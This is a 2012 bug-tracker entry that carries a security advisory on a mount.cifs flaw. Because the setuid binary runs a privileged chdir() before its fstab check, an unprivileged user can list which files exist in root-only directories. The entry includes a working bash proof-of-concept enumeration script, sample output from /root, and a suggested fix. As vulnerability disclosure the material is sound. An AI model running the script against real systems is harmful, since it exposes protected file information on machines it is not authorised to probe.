Bug 8800 - mount.cifs arbitary file identification as root
Summary: mount.cifs arbitary file identification as root
Status: RESOLVED DUPLICATE of bug 8821
Alias: None
Product: CifsVFS
Classification: Unclassified
Component: user space tools (show other bugs)
Version: 2.6
Hardware: All All
: P5 major
Target Milestone: ---
Assignee: Jeff Layton
QA Contact:
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2012-03-07 19:11 UTC by Jesus
Modified: 2012-04-02 12:34 UTC (History)
0 users

See Also:


Attachments
advisory (2.81 KB, application/octet-stream)
2012-03-07 19:11 UTC, Jesus
no flags Details

Note You need to log in before you can comment on or make changes to this bug.
Description Jesus 2012-03-07 19:11:01 UTC
Created attachment 7363 [details]
advisory

For example, /root/secretfile can be identified, becouse any user can control the privileged chdir() and infer the response.

The chdir() maybe should be launched afther the fstab check, and only over fstab  dierctories.



########## Blueliv Advisory 2011-002 ##########
- Discovered by: Jesus Olmos Gonzalez
- Risk: 5/5
- Impact: 1/5
###############################################

1. VULNERABILITY
-------------------------
linux arbitrary privileged arbitrary chdir(),
this leads to an arbitarry file identification as root.

2. BACKGROUND
-------------------------
mount.cifs (GNU Software) is part of linux base system, and is setuided on
most of the distributions.

This software mounts cifs partition to authorized directories by fstab.




3. DESCRIPTION
-------------------------
Althow there is not authorized cifs mounts, is possible by the second parameter
to control a privileged chdir() syscall and infer the return value throught
the responses.

This implies, a little security breach on linux permissions. A non root user
can enumerate files and directories as root.

This can help to exploit another vulnerabilities, enumerate /root/ contents,
descriptors used by any process, user homes, etc ...

one of the attack vectors is /root/ directory scan:

[sha0@spinlock advs]$ ./root_eye.sh wordlist /root/
--- directories ---
.pulse1
.bash_history
.alsaplayer
.dbus
.mozilla
.VirtualBox
.vim
.links
.config
.cpan
.gnome2
--- files ---
.pulse-cookie
.keystore
.bash_profile

dead.letter
.mysql_history
.Xauthority
.vimrc
.viminfo
secret

Also let to enumerate sub-sub directories in order to dump readable files.



4. PROOF OF CONCEPT
-------------------------
#!/bin/bash
# root enumerator 0day by jesus.olmos@blueliv.com
# discover root protected files & directories, user homes, process descriptors, ...

path=$2
wordlist=$1

for i in `cat $wordlist`
do

echo -n "$i:"

/sbin/mount.cifs  //127.0.0.1/a $path/$i

done 2>log.$$ 1>&2

echo --- directories ---
for i in `grep 'denied' log.$$ | cut -d ':' -f 1`
do
        echo $i
done

echo --- files ---
for i in `grep -i 'not a directory' log.$$ | cut -d ':' -f 1`
do
        echo $i
done

rm log.$$



5. BUSINESS IMPACT
-------------------------
The confidenciality can be breached,

This method of transfer files, is highly dangerous and can rely on a remote control of the server


6. SYSTEMS AFFECTED
-------------------------
all versions are affected

7. SOLUTION
-------------------------
The chdir() should be done after the fstab check.

8. REFERENCES
-------------------------
http://gnu.org


9. CREDITS
-------------------------
Jesus Olmos Gonzalez jolmos(at)blueliv(dot)com
Blueliv SL


10. DISCOLSURE TIMELINE
-------------------------
February  20, 2012: Vulnerability discovered
March     07, 2012: Reported to the vendor


11. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.
Comment 1 Jeff Layton 2012-04-02 12:34:00 UTC

*** This bug has been marked as a duplicate of bug 8821 ***